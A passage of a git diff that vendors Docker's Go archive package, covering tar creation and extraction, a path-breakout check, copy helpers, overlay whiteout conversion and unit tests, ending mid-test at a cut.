ENOTSUP should be emitted in that case, otherwise we still + // bail. + errors = append(errors, err.Error()) + continue + } + return err + } + + } + + if len(errors) > 0 { + logrus.WithFields(logrus.Fields{ + "errors": errors, + }).Warn("ignored xattrs in archive: underlying filesystem doesn't support them") + } + + // There is no LChmod, so ignore mode for symlink. Also, this + // must happen after chown, as that can modify the file mode + if err := handleLChmod(hdr, path, hdrInfo); err != nil { + return err + } + + aTime := hdr.AccessTime + if aTime.Before(hdr.ModTime) { + // Last access time should never be before last modified time. + aTime = hdr.ModTime + } + + // system.Chtimes doesn't support a NOFOLLOW flag atm + if hdr.Typeflag == tar.TypeLink { + if fi, err := os.Lstat(hdr.Linkname); err == nil && (fi.Mode()&os.ModeSymlink == 0) { + if err := system.Chtimes(path, aTime, hdr.ModTime); err != nil { + return err + } + } + } else if hdr.Typeflag != tar.TypeSymlink { + if err := system.Chtimes(path, aTime, hdr.ModTime); err != nil { + return err + } + } else { + ts := []syscall.Timespec{timeToTimespec(aTime), timeToTimespec(hdr.ModTime)} + if err := system.LUtimesNano(path, ts); err != nil && err != system.ErrNotSupportedPlatform { + return err + } + } + return nil +} + +// Tar creates an archive from the directory at `path`, and returns it as a +// stream of bytes. +func Tar(path string, compression Compression) (io.ReadCloser, error) { + return TarWithOptions(path, &TarOptions{Compression: compression}) +} + +// TarWithOptions creates an archive from the directory at `path`, only including files whose relative +// paths are included in `options.IncludeFiles` (if non-nil) or not in `options.ExcludePatterns`. +func TarWithOptions(srcPath string, options *TarOptions) (io.ReadCloser, error) { + + // Fix the source path to work with long path names. This is a no-op + // on platforms other than Windows. + srcPath = fixVolumePathPrefix(srcPath) + + patterns, patDirs, exceptions, err := fileutils.CleanPatterns(options.ExcludePatterns) + + if err != nil { + return nil, err + } + + pipeReader, pipeWriter := io.Pipe() + + compressWriter, err := CompressStream(pipeWriter, options.Compression) + if err != nil { + return nil, err + } + + go func() { + ta := &tarAppender{ + TarWriter: tar.NewWriter(compressWriter), + Buffer: pools.BufioWriter32KPool.Get(nil), + SeenFiles: make(map[uint64]string), + UIDMaps: options.UIDMaps, + GIDMaps: options.GIDMaps, + WhiteoutConverter: getWhiteoutConverter(options.WhiteoutFormat), + } + + defer func() { + // Make sure to check the error on Close. + if err := ta.TarWriter.Close(); err != nil { + logrus.Errorf("Can't close tar writer: %s", err) + } + if err := compressWriter.Close(); err != nil { + logrus.Errorf("Can't close compress writer: %s", err) + } + if err := pipeWriter.Close(); err != nil { + logrus.Errorf("Can't close pipe writer: %s", err) + } + }() + + // this buffer is needed for the duration of this piped stream + defer pools.BufioWriter32KPool.Put(ta.Buffer) + + // In general we log errors here but ignore them because + // during e.g. a diff operation the container can continue + // mutating the filesystem and we can see transient errors + // from this + + stat, err := os.Lstat(srcPath) + if err != nil { + return + } + + if !stat.IsDir() { + // We can't later join a non-dir with any includes because the + // 'walk' will error if "file/." is stat-ed and "file" is not a + // directory. So, we must split the source path and use the + // basename as the include. + if len(options.IncludeFiles) > 0 { + logrus.Warn("Tar: Can't archive a file with includes") + } + + dir, base := SplitPathDirEntry(srcPath) + srcPath = dir + options.IncludeFiles = []string{base} + } + + if len(options.IncludeFiles) == 0 { + options.IncludeFiles = []string{"."} + } + + seen := make(map[string]bool) + + for _, include := range options.IncludeFiles { + rebaseName := options.RebaseNames[include] + + walkRoot := getWalkRoot(srcPath, include) + filepath.Walk(walkRoot, func(filePath string, f os.FileInfo, err error) error { + if err != nil { + logrus.Errorf("Tar: Can't stat file %s to tar: %s", srcPath, err) + return nil + } + + relFilePath, err := filepath.Rel(srcPath, filePath) + if err != nil || (!options.IncludeSourceDir && relFilePath == "." && f.IsDir()) { + // Error getting relative path OR we are looking + // at the source directory path. Skip in both situations. + return nil + } + + if options.IncludeSourceDir && include == "." && relFilePath != "." { + relFilePath = strings.Join([]string{".", relFilePath}, string(filepath.Separator)) + } + + skip := false + + // If "include" is an exact match for the current file + // then even if there's an "excludePatterns" pattern that + // matches it, don't skip it. IOW, assume an explicit 'include' + // is asking for that file no matter what - which is true + // for some files, like .dockerignore and Dockerfile (sometimes) + if include != relFilePath { + skip, err = fileutils.OptimizedMatches(relFilePath, patterns, patDirs) + if err != nil { + logrus.Errorf("Error matching %s: %v", relFilePath, err) + return err + } + } + + if skip { + // If we want to skip this file and its a directory + // then we should first check to see if there's an + // excludes pattern (eg !dir/file) that starts with this + // dir. If so then we can't skip this dir. + + // Its not a dir then so we can just return/skip. + if !f.IsDir() { + return nil + } + + // No exceptions (!...) in patterns so just skip dir + if !exceptions { + return filepath.SkipDir + } + + dirSlash := relFilePath + string(filepath.Separator) + + for _, pat := range patterns { + if pat[0] != '!' { + continue + } + pat = pat[1:] + string(filepath.Separator) + if strings.HasPrefix(pat, dirSlash) { + // found a match - so can't skip this dir + return nil + } + } + + // No matching exclusion dir so just skip dir + return filepath.SkipDir + } + + if seen[relFilePath] { + return nil + } + seen[relFilePath] = true + + // Rename the base resource. + if rebaseName != "" { + var replacement string + if rebaseName != string(filepath.Separator) { + // Special case the root directory to replace with an + // empty string instead so that we don't end up with + // double slashes in the paths. + replacement = rebaseName + } + + relFilePath = strings.Replace(relFilePath, include, replacement, 1) + } + + if err := ta.addTarFile(filePath, relFilePath); err != nil { + logrus.Errorf("Can't add file %s to tar: %s", filePath, err) + // if pipe is broken, stop writing tar stream to it + if err == io.ErrClosedPipe { + return err + } + } + return nil + }) + } + }() + + return pipeReader, nil +} + +// Unpack unpacks the decompressedArchive to dest with options. +func Unpack(decompressedArchive io.Reader, dest string, options *TarOptions) error { + tr := tar.NewReader(decompressedArchive) + trBuf := pools.BufioReader32KPool.Get(nil) + defer pools.BufioReader32KPool.Put(trBuf) + + var dirs []*tar.Header + remappedRootUID, remappedRootGID, err := idtools.GetRootUIDGID(options.UIDMaps, options.GIDMaps) + if err != nil { + return err + } + whiteoutConverter := getWhiteoutConverter(options.WhiteoutFormat) + + // Iterate through the files in the archive. +loop: + for { + hdr, err := tr.Next() + if err == io.EOF { + // end of tar archive + break + } + if err != nil { + return err + } + + // Normalize name, for safety and for a simple is-root check + // This keeps "../" as-is, but normalizes "/../" to "/". Or Windows: + // This keeps "..\" as-is, but normalizes "\..\" to "\". + hdr.Name = filepath.Clean(hdr.Name) + + for _, exclude := range options.ExcludePatterns { + if strings.HasPrefix(hdr.Name, exclude) { + continue loop + } + } + + // After calling filepath.Clean(hdr.Name) above, hdr.Name will now be in + // the filepath format for the OS on which the daemon is running. Hence + // the check for a slash-suffix MUST be done in an OS-agnostic way. + if !strings.HasSuffix(hdr.Name, string(os.PathSeparator)) { + // Not the root directory, ensure that the parent directory exists + parent := filepath.Dir(hdr.Name) + parentPath := filepath.Join(dest, parent) + if _, err := os.Lstat(parentPath); err != nil && os.IsNotExist(err) { + err = idtools.MkdirAllNewAs(parentPath, 0777, remappedRootUID, remappedRootGID) + if err != nil { + return err + } + } + } + + path := filepath.Join(dest, hdr.Name) + rel, err := filepath.Rel(dest, path) + if err != nil { + return err + } + if strings.HasPrefix(rel, ".."+string(os.PathSeparator)) { + return breakoutError(fmt.Errorf("%q is outside of %q", hdr.Name, dest)) + } + + // If path exits we almost always just want to remove and replace it + // The only exception is when it is a directory *and* the file from + // the layer is also a directory. Then we want to merge them (i.e. + // just apply the metadata from the layer). + if fi, err := os.Lstat(path); err == nil { + if options.NoOverwriteDirNonDir && fi.IsDir() && hdr.Typeflag != tar.TypeDir { + // If NoOverwriteDirNonDir is true then we cannot replace + // an existing directory with a non-directory from the archive. + return fmt.Errorf("cannot overwrite directory %q with non-directory %q", path, dest) + } + + if options.NoOverwriteDirNonDir && !fi.IsDir() && hdr.Typeflag == tar.TypeDir { + // If NoOverwriteDirNonDir is true then we cannot replace + // an existing non-directory with a directory from the archive. + return fmt.Errorf("cannot overwrite non-directory %q with directory %q", path, dest) + } + + if fi.IsDir() && hdr.Name == "." { + continue + } + + if !(fi.IsDir() && hdr.Typeflag == tar.TypeDir) { + if err := os.RemoveAll(path); err != nil { + return err + } + } + } + trBuf.Reset(tr) + + // if the options contain a uid & gid maps, convert header uid/gid + // entries using the maps such that lchown sets the proper mapped + // uid/gid after writing the file. We only perform this mapping if + // the file isn't already owned by the remapped root UID or GID, as + // that specific uid/gid has no mapping from container -> host, and + // those files already have the proper ownership for inside the + // container. + if hdr.Uid != remappedRootUID { + xUID, err := idtools.ToHost(hdr.Uid, options.UIDMaps) + if err != nil { + return err + } + hdr.Uid = xUID + } + if hdr.Gid != remappedRootGID { + xGID, err := idtools.ToHost(hdr.Gid, options.GIDMaps) + if err != nil { + return err + } + hdr.Gid = xGID + } + + if whiteoutConverter != nil { + writeFile, err := whiteoutConverter.ConvertRead(hdr, path) + if err != nil { + return err + } + if !writeFile { + continue + } + } + + if err := createTarFile(path, dest, hdr, trBuf, !options.NoLchown, options.ChownOpts, options.InUserNS); err != nil { + return err + } + + // Directory mtimes must be handled at the end to avoid further + // file creation in them to modify the directory mtime + if hdr.Typeflag == tar.TypeDir { + dirs = append(dirs, hdr) + } + } + + for _, hdr := range dirs { + path := filepath.Join(dest, hdr.Name) + + if err := system.Chtimes(path, hdr.AccessTime, hdr.ModTime); err != nil { + return err + } + } + return nil +} + +// Untar reads a stream of bytes from `archive`, parses it as a tar archive, +// and unpacks it into the directory at `dest`. +// The archive may be compressed with one of the following algorithms: +// identity (uncompressed), gzip, bzip2, xz. +// FIXME: specify behavior when target path exists vs. doesn't exist. +func Untar(tarArchive io.Reader, dest string, options *TarOptions) error { + return untarHandler(tarArchive, dest, options, true) +} + +// UntarUncompressed reads a stream of bytes from `archive`, parses it as a tar archive, +// and unpacks it into the directory at `dest`. +// The archive must be an uncompressed stream. +func UntarUncompressed(tarArchive io.Reader, dest string, options *TarOptions) error { + return untarHandler(tarArchive, dest, options, false) +} + +// Handler for teasing out the automatic decompression +func untarHandler(tarArchive io.Reader, dest string, options *TarOptions, decompress bool) error { + if tarArchive == nil { + return fmt.Errorf("Empty archive") + } + dest = filepath.Clean(dest) + if options == nil { + options = &TarOptions{} + } + if options.ExcludePatterns == nil { + options.ExcludePatterns = []string{} + } + + r := tarArchive + if decompress { + decompressedArchive, err := DecompressStream(tarArchive) + if err != nil { + return err + } + defer decompressedArchive.Close() + r = decompressedArchive + } + + return Unpack(r, dest, options) +} + +// TarUntar is a convenience function which calls Tar and Untar, with the output of one piped into the other. +// If either Tar or Untar fails, TarUntar aborts and returns the error. +func (archiver *Archiver) TarUntar(src, dst string) error { + logrus.Debugf("TarUntar(%s %s)", src, dst) + archive, err := TarWithOptions(src, &TarOptions{Compression: Uncompressed}) + if err != nil { + return err + } + defer archive.Close() + + var options *TarOptions + if archiver.UIDMaps != nil || archiver.GIDMaps != nil { + options = &TarOptions{ + UIDMaps: archiver.UIDMaps, + GIDMaps: archiver.GIDMaps, + } + } + return archiver.Untar(archive, dst, options) +} + +// TarUntar is a convenience function which calls Tar and Untar, with the output of one piped into the other. +// If either Tar or Untar fails, TarUntar aborts and returns the error. +func TarUntar(src, dst string) error { + return defaultArchiver.TarUntar(src, dst) +} + +// UntarPath untar a file from path to a destination, src is the source tar file path. +func (archiver *Archiver) UntarPath(src, dst string) error { + archive, err := os.Open(src) + if err != nil { + return err + } + defer archive.Close() + var options *TarOptions + if archiver.UIDMaps != nil || archiver.GIDMaps != nil { + options = &TarOptions{ + UIDMaps: archiver.UIDMaps, + GIDMaps: archiver.GIDMaps, + } + } + return archiver.Untar(archive, dst, options) +} + +// UntarPath is a convenience function which looks for an archive +// at filesystem path `src`, and unpacks it at `dst`. +func UntarPath(src, dst string) error { + return defaultArchiver.UntarPath(src, dst) +} + +// CopyWithTar creates a tar archive of filesystem path `src`, and +// unpacks it at filesystem path `dst`. +// The archive is streamed directly with fixed buffering and no +// intermediary disk IO. +func (archiver *Archiver) CopyWithTar(src, dst string) error { + srcSt, err := os.Stat(src) + if err != nil { + return err + } + if !srcSt.IsDir() { + return archiver.CopyFileWithTar(src, dst) + } + + // if this archiver is set up with ID mapping we need to create + // the new destination directory with the remapped root UID/GID pair + // as owner + rootUID, rootGID, err := idtools.GetRootUIDGID(archiver.UIDMaps, archiver.GIDMaps) + if err != nil { + return err + } + // Create dst, copy src's content into it + logrus.Debugf("Creating dest directory: %s", dst) + if err := idtools.MkdirAllNewAs(dst, 0755, rootUID, rootGID); err != nil { + return err + } + logrus.Debugf("Calling TarUntar(%s, %s)", src, dst) + return archiver.TarUntar(src, dst) +} + +// CopyWithTar creates a tar archive of filesystem path `src`, and +// unpacks it at filesystem path `dst`. +// The archive is streamed directly with fixed buffering and no +// intermediary disk IO. +func CopyWithTar(src, dst string) error { + return defaultArchiver.CopyWithTar(src, dst) +} + +// CopyFileWithTar emulates the behavior of the 'cp' command-line +// for a single file. It copies a regular file from path `src` to +// path `dst`, and preserves all its metadata. +func (archiver *Archiver) CopyFileWithTar(src, dst string) (err error) { + logrus.Debugf("CopyFileWithTar(%s, %s)", src, dst) + srcSt, err := os.Stat(src) + if err != nil { + return err + } + + if srcSt.IsDir() { + return fmt.Errorf("Can't copy a directory") + } + + // Clean up the trailing slash. This must be done in an operating + // system specific manner. + if dst[len(dst)-1] == os.PathSeparator { + dst = filepath.Join(dst, filepath.Base(src)) + } + // Create the holding directory if necessary + if err := system.MkdirAll(filepath.Dir(dst), 0700); err != nil { + return err + } + + r, w := io.Pipe() + errC := promise.Go(func() error { + defer w.Close() + + srcF, err := os.Open(src) + if err != nil { + return err + } + defer srcF.Close() + + hdr, err := tar.FileInfoHeader(srcSt, "") + if err != nil { + return err + } + hdr.Name = filepath.Base(dst) + hdr.Mode = int64(chmodTarEntry(os.FileMode(hdr.Mode))) + + remappedRootUID, remappedRootGID, err := idtools.GetRootUIDGID(archiver.UIDMaps, archiver.GIDMaps) + if err != nil { + return err + } + + // only perform mapping if the file being copied isn't already owned by the + // uid or gid of the remapped root in the container + if remappedRootUID != hdr.Uid { + xUID, err := idtools.ToHost(hdr.Uid, archiver.UIDMaps) + if err != nil { + return err + } + hdr.Uid = xUID + } + if remappedRootGID != hdr.Gid { + xGID, err := idtools.ToHost(hdr.Gid, archiver.GIDMaps) + if err != nil { + return err + } + hdr.Gid = xGID + } + + tw := tar.NewWriter(w) + defer tw.Close() + if err := tw.WriteHeader(hdr); err != nil { + return err + } + if _, err := io.Copy(tw, srcF); err != nil { + return err + } + return nil + }) + defer func() { + if er := <-errC; err == nil && er != nil { + err = er + } + }() + + err = archiver.Untar(r, filepath.Dir(dst), nil) + if err != nil { + r.CloseWithError(err) + } + return err +} + +// CopyFileWithTar emulates the behavior of the 'cp' command-line +// for a single file. It copies a regular file from path `src` to +// path `dst`, and preserves all its metadata. +// +// Destination handling is in an operating specific manner depending +// where the daemon is running. If `dst` ends with a trailing slash +// the final destination path will be `dst/base(src)` (Linux) or +// `dst\base(src)` (Windows). +func CopyFileWithTar(src, dst string) (err error) { + return defaultArchiver.CopyFileWithTar(src, dst) +} + +// cmdStream executes a command, and returns its stdout as a stream. +// If the command fails to run or doesn't complete successfully, an error +// will be returned, including anything written on stderr. +func cmdStream(cmd *exec.Cmd, input io.Reader) (io.ReadCloser, <-chan struct{}, error) { + chdone := make(chan struct{}) + cmd.Stdin = input + pipeR, pipeW := io.Pipe() + cmd.Stdout = pipeW + var errBuf bytes.Buffer + cmd.Stderr = &errBuf + + // Run the command and return the pipe + if err := cmd.Start(); err != nil { + return nil, nil, err + } + + // Copy stdout to the returned pipe + go func() { + if err := cmd.Wait(); err != nil { + pipeW.CloseWithError(fmt.Errorf("%s: %s", err, errBuf.String())) + } else { + pipeW.Close() + } + close(chdone) + }() + + return pipeR, chdone, nil +} + +// NewTempArchive reads the content of src into a temporary file, and returns the contents +// of that file as an archive. The archive can only be read once - as soon as reading completes, +// the file will be deleted. +func NewTempArchive(src io.Reader, dir string) (*TempArchive, error) { + f, err := ioutil.TempFile(dir, "") + if err != nil { + return nil, err + } + if _, err := io.Copy(f, src); err != nil { + return nil, err + } + if _, err := f.Seek(0, 0); err != nil { + return nil, err + } + st, err := f.Stat() + if err != nil { + return nil, err + } + size := st.Size() + return &TempArchive{File: f, Size: size}, nil +} + +// TempArchive is a temporary archive. The archive can only be read once - as soon as reading completes, +// the file will be deleted. +type TempArchive struct { + *os.File + Size int64 // Pre-computed from Stat().Size() as a convenience + read int64 + closed bool +} + +// Close closes the underlying file if it's still open, or does a no-op +// to allow callers to try to close the TempArchive multiple times safely. +func (archive *TempArchive) Close() error { + if archive.closed { + return nil + } + + archive.closed = true + + return archive.File.Close() +} + +func (archive *TempArchive) Read(data []byte) (int, error) { + n, err := archive.File.Read(data) + archive.read += int64(n) + if err != nil || archive.read == archive.Size { + archive.Close() + os.Remove(archive.File.Name()) + } + return n, err +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_linux.go b/vendor/github.com/docker/docker/pkg/archive/archive_linux.go new file mode 100644 index 0000000000..6b2a31ff1f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/archive_linux.go @@ -0,0 +1,95 @@ +package archive + +import ( + "archive/tar" + "os" + "path/filepath" + "strings" + "syscall" + + "github.com/docker/docker/pkg/system" +) + +func getWhiteoutConverter(format WhiteoutFormat) tarWhiteoutConverter { + if format == OverlayWhiteoutFormat { + return overlayWhiteoutConverter{} + } + return nil +} + +type overlayWhiteoutConverter struct{} + +func (overlayWhiteoutConverter) ConvertWrite(hdr *tar.Header, path string, fi os.FileInfo) (wo *tar.Header, err error) { + // convert whiteouts to AUFS format + if fi.Mode()&os.ModeCharDevice != 0 && hdr.Devmajor == 0 && hdr.Devminor == 0 { + // we just rename the file and make it normal + dir, filename := filepath.Split(hdr.Name) + hdr.Name = filepath.Join(dir, WhiteoutPrefix+filename) + hdr.Mode = 0600 + hdr.Typeflag = tar.TypeReg + hdr.Size = 0 + } + + if fi.Mode()&os.ModeDir != 0 { + // convert opaque dirs to AUFS format by writing an empty file with the prefix + opaque, err := system.Lgetxattr(path, "trusted.overlay.opaque") + if err != nil { + return nil, err + } + if len(opaque) == 1 && opaque[0] == 'y' { + if hdr.Xattrs != nil { + delete(hdr.Xattrs, "trusted.overlay.opaque") + } + + // create a header for the whiteout file + // it should inherit some properties from the parent, but be a regular file + wo = &tar.Header{ + Typeflag: tar.TypeReg, + Mode: hdr.Mode & int64(os.ModePerm), + Name: filepath.Join(hdr.Name, WhiteoutOpaqueDir), + Size: 0, + Uid: hdr.Uid, + Uname: hdr.Uname, + Gid: hdr.Gid, + Gname: hdr.Gname, + AccessTime: hdr.AccessTime, + ChangeTime: hdr.ChangeTime, + } + } + } + + return +} + +func (overlayWhiteoutConverter) ConvertRead(hdr *tar.Header, path string) (bool, error) { + base := filepath.Base(path) + dir := filepath.Dir(path) + + // if a directory is marked as opaque by the AUFS special file, we need to translate that to overlay + if base == WhiteoutOpaqueDir { + if err := syscall.Setxattr(dir, "trusted.overlay.opaque", []byte{'y'}, 0); err != nil { + return false, err + } + + // don't write the file itself + return false, nil + } + + // if a file was deleted and we are using overlay, we need to create a character device + if strings.HasPrefix(base, WhiteoutPrefix) { + originalBase := base[len(WhiteoutPrefix):] + originalPath := filepath.Join(dir, originalBase) + + if err := syscall.Mknod(originalPath, syscall.S_IFCHR, 0); err != nil { + return false, err + } + if err := os.Chown(originalPath, hdr.Uid, hdr.Gid); err != nil { + return false, err + } + + // don't write the file itself + return false, nil + } + + return true, nil +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go new file mode 100644 index 0000000000..d5f046e9df --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go @@ -0,0 +1,187 @@ +package archive + +import ( + "io/ioutil" + "os" + "path/filepath" + "syscall" + "testing" + + "github.com/docker/docker/pkg/system" +) + +// setupOverlayTestDir creates files in a directory with overlay whiteouts +// Tree layout +// . +// ├── d1 # opaque, 0700 +// │   └── f1 # empty file, 0600 +// ├── d2 # opaque, 0750 +// │   └── f1 # empty file, 0660 +// └── d3 # 0700 +// └── f1 # whiteout, 0644 +func setupOverlayTestDir(t *testing.T, src string) { + // Create opaque directory containing single file and permission 0700 + if err := os.Mkdir(filepath.Join(src, "d1"), 0700); err != nil { + t.Fatal(err) + } + + if err := system.Lsetxattr(filepath.Join(src, "d1"), "trusted.overlay.opaque", []byte("y"), 0); err != nil { + t.Fatal(err) + } + + if err := ioutil.WriteFile(filepath.Join(src, "d1", "f1"), []byte{}, 0600); err != nil { + t.Fatal(err) + } + + // Create another opaque directory containing single file but with permission 0750 + if err := os.Mkdir(filepath.Join(src, "d2"), 0750); err != nil { + t.Fatal(err) + } + + if err := system.Lsetxattr(filepath.Join(src, "d2"), "trusted.overlay.opaque", []byte("y"), 0); err != nil { + t.Fatal(err) + } + + if err := ioutil.WriteFile(filepath.Join(src, "d2", "f1"), []byte{}, 0660); err != nil { + t.Fatal(err) + } + + // Create regular directory with deleted file + if err := os.Mkdir(filepath.Join(src, "d3"), 0700); err != nil { + t.Fatal(err) + } + + if err := system.Mknod(filepath.Join(src, "d3", "f1"), syscall.S_IFCHR, 0); err != nil { + t.Fatal(err) + } +} + +func checkOpaqueness(t *testing.T, path string, opaque string) { + xattrOpaque, err := system.Lgetxattr(path, "trusted.overlay.opaque") + if err != nil { + t.Fatal(err) + } + if string(xattrOpaque) != opaque { + t.Fatalf("Unexpected opaque value: %q, expected %q", string(xattrOpaque), opaque) + } + +} + +func checkOverlayWhiteout(t *testing.T, path string) { + stat, err := os.Stat(path) + if err != nil { + t.Fatal(err) + } + statT, ok := stat.Sys().(*syscall.Stat_t) + if !ok { + t.Fatalf("Unexpected type: %t, expected *syscall.Stat_t", stat.Sys()) + } + if statT.Rdev != 0 { + t.Fatalf("Non-zero device number for whiteout") + } +} + +func checkFileMode(t *testing.T, path string, perm os.FileMode) { + stat, err := os.Stat(path) + if err != nil { + t.Fatal(err) + } + if stat.Mode() != perm { + t.Fatalf("Unexpected file mode for %s: %o, expected %o", path, stat.Mode(), perm) + } +} + +func TestOverlayTarUntar(t *testing.T) { + oldmask, err := system.Umask(0) + if err != nil { + t.Fatal(err) + } + defer system.Umask(oldmask) + + src, err := ioutil.TempDir("", "docker-test-overlay-tar-src") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(src) + + setupOverlayTestDir(t, src) + + dst, err := ioutil.TempDir("", "docker-test-overlay-tar-dst") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dst) + + options := &TarOptions{ + Compression: Uncompressed, + WhiteoutFormat: OverlayWhiteoutFormat, + } + archive, err := TarWithOptions(src, options) + if err != nil { + t.Fatal(err) + } + defer archive.Close() + + if err := Untar(archive, dst, options); err != nil { + t.Fatal(err) + } + + checkFileMode(t, filepath.Join(dst, "d1"), 0700|os.ModeDir) + checkFileMode(t, filepath.Join(dst, "d2"), 0750|os.ModeDir) + checkFileMode(t, filepath.Join(dst, "d3"), 0700|os.ModeDir) + checkFileMode(t, filepath.Join(dst, "d1", "f1"), 0600) + checkFileMode(t, filepath.Join(dst, "d2", "f1"), 0660) + checkFileMode(t, filepath.Join(dst, "d3", "f1"), os.ModeCharDevice|os.ModeDevice) + + checkOpaqueness(t, filepath.Join(dst, "d1"), "y") + checkOpaqueness(t, filepath.Join(dst, "d2"), "y") + checkOpaqueness(t, filepath.Join(dst, "d3"), "") + checkOverlayWhiteout(t, filepath.Join(dst, "d3", "f1")) +} + +func TestOverlayTarAUFSUntar(t *testing.T) { + oldmask, err := system.Umask(0) + if err != nil { + t.Fatal(err) + } + defer system.Umask(oldmask) + + src, err := ioutil.TempDir("", "docker-test-overlay-tar-src") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(src) + + setupOverlayTestDir(t, src) + + dst, err := ioutil.TempDir("", "docker-test-overlay-tar-dst") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dst) + + archive, err := TarWithOptions(src, &TarOptions{ + Compression: Uncompressed, + WhiteoutFormat: OverlayWhiteoutFormat, + }) + if err != nil { + t.Fatal(err) + } + defer archive.Close() + + if err := Untar(archive, dst, &TarOptions{ + Compression: Uncompressed, + WhiteoutFormat: AUFSWhiteoutFormat, + }); err != nil { + t.Fatal(err) + } + + checkFileMode(t, filepath.Join(dst, "d1"), 0700|os.ModeDir) + checkFileMode(t, filepath.Join(dst, "d1", WhiteoutOpaqueDir), 0700) + checkFileMode(t, filepath.Join(dst, "d2"), 0750|os.ModeDir) + checkFileMode(t, filepath.Join(dst, "d2", WhiteoutOpaqueDir), 0750) + checkFileMode(t, filepath.Join(dst, "d3"), 0700|os.ModeDir) + checkFileMode(t, filepath.Join(dst, "d1", "f1"), 0600) + checkFileMode(t, filepath.Join(dst, "d2", "f1"), 0660) + checkFileMode(t, filepath.Join(dst, "d3", WhiteoutPrefix+"f1"), 0600) +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_other.go b/vendor/github.com/docker/docker/pkg/archive/archive_other.go new file mode 100644 index 0000000000..54acbf2856 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/archive_other.go @@ -0,0 +1,7 @@ +// +build !linux + +package archive + +func getWhiteoutConverter(format WhiteoutFormat) tarWhiteoutConverter { + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_test.go new file mode 100644 index 0000000000..b883be33ed --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/archive_test.go @@ -0,0 +1,1162 @@ +package archive + +import ( + "archive/tar" + "bytes" + "fmt" + "io" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "runtime" + "strings" + "testing" + "time" +) + +var tmp string + +func init() { + tmp = "/tmp/" + if runtime.GOOS == "windows" { + tmp = os.Getenv("TEMP") + `\` + } +} + +func TestIsArchiveNilHeader(t *testing.T) { + out := IsArchive(nil) + if out { + t.Fatalf("isArchive should return false as nil is not a valid archive header") + } +} + +func TestIsArchiveInvalidHeader(t *testing.T) { + header := []byte{0x00, 0x01, 0x02} + out := IsArchive(header) + if out { + t.Fatalf("isArchive should return false as %s is not a valid archive header", header) + } +} + +func TestIsArchiveBzip2(t *testing.T) { + header := []byte{0x42, 0x5A, 0x68} + out := IsArchive(header) + if !out { + t.Fatalf("isArchive should return true as %s is a bz2 header", header) + } +} + +func TestIsArchive7zip(t *testing.T) { + header := []byte{0x50, 0x4b, 0x03, 0x04} + out := IsArchive(header) + if out { + t.Fatalf("isArchive should return false as %s is a 7z header and it is not supported", header) + } +} + +func TestIsArchivePathDir(t *testing.T) { + cmd := exec.Command("sh", "-c", "mkdir -p /tmp/archivedir") + output, err := cmd.CombinedOutput() + if err != nil { + t.Fatalf("Fail to create an archive file for test : %s.", output) + } + if IsArchivePath(tmp + "archivedir") { + t.Fatalf("Incorrectly recognised directory as an archive") + } +} + +func TestIsArchivePathInvalidFile(t *testing.T) { + cmd := exec.Command("sh", "-c", "dd if=/dev/zero bs=1024 count=1 of=/tmp/archive && gzip --stdout /tmp/archive > /tmp/archive.gz") + output, err := cmd.CombinedOutput() + if err != nil { + t.Fatalf("Fail to create an archive file for test : %s.", output) + } + if IsArchivePath(tmp + "archive") { + t.Fatalf("Incorrectly recognised invalid tar path as archive") + } + if IsArchivePath(tmp + "archive.gz") { + t.Fatalf("Incorrectly recognised invalid compressed tar path as archive") + } +} + +func TestIsArchivePathTar(t *testing.T) { + var whichTar string + if runtime.GOOS == "solaris" { + whichTar = "gtar" + } else { + whichTar = "tar" + } + cmdStr := fmt.Sprintf("touch /tmp/archivedata && %s -cf /tmp/archive /tmp/archivedata && gzip --stdout /tmp/archive > /tmp/archive.gz", whichTar) + cmd := exec.Command("sh", "-c", cmdStr) + output, err := cmd.CombinedOutput() + if err != nil { + t.Fatalf("Fail to create an archive file for test : %s.", output) + } + if !IsArchivePath(tmp + "/archive") { + t.Fatalf("Did not recognise valid tar path as archive") + } + if !IsArchivePath(tmp + "archive.gz") { + t.Fatalf("Did not recognise valid compressed tar path as archive") + } +} + +func testDecompressStream(t *testing.T, ext, compressCommand string) { + cmd := exec.Command("sh", "-c", + fmt.Sprintf("touch /tmp/archive && %s /tmp/archive", compressCommand)) + output, err := cmd.CombinedOutput() + if err != nil { + t.Fatalf("Failed to create an archive file for test : %s.", output) + } + filename := "archive." + ext + archive, err := os.Open(tmp + filename) + if err != nil { + t.Fatalf("Failed to open file %s: %v", filename, err) + } + defer archive.Close() + + r, err := DecompressStream(archive) + if err != nil { + t.Fatalf("Failed to decompress %s: %v", filename, err) + } + if _, err = ioutil.ReadAll(r); err != nil { + t.Fatalf("Failed to read the decompressed stream: %v ", err) + } + if err = r.Close(); err != nil { + t.Fatalf("Failed to close the decompressed stream: %v ", err) + } +} + +func TestDecompressStreamGzip(t *testing.T) { + testDecompressStream(t, "gz", "gzip -f") +} + +func TestDecompressStreamBzip2(t *testing.T) { + testDecompressStream(t, "bz2", "bzip2 -f") +} + +func TestDecompressStreamXz(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("Xz not present in msys2") + } + testDecompressStream(t, "xz", "xz -f") +} + +func TestCompressStreamXzUnsuported(t *testing.T) { + dest, err := os.Create(tmp + "dest") + if err != nil { + t.Fatalf("Fail to create the destination file") + } + defer dest.Close() + + _, err = CompressStream(dest, Xz) + if err == nil { + t.Fatalf("Should fail as xz is unsupported for compression format.") + } +} + +func TestCompressStreamBzip2Unsupported(t *testing.T) { + dest, err := os.Create(tmp + "dest") + if err != nil { + t.Fatalf("Fail to create the destination file") + } + defer dest.Close() + + _, err = CompressStream(dest, Xz) + if err == nil { + t.Fatalf("Should fail as xz is unsupported for compression format.") + } +} + +func TestCompressStreamInvalid(t *testing.T) { + dest, err := os.Create(tmp + "dest") + if err != 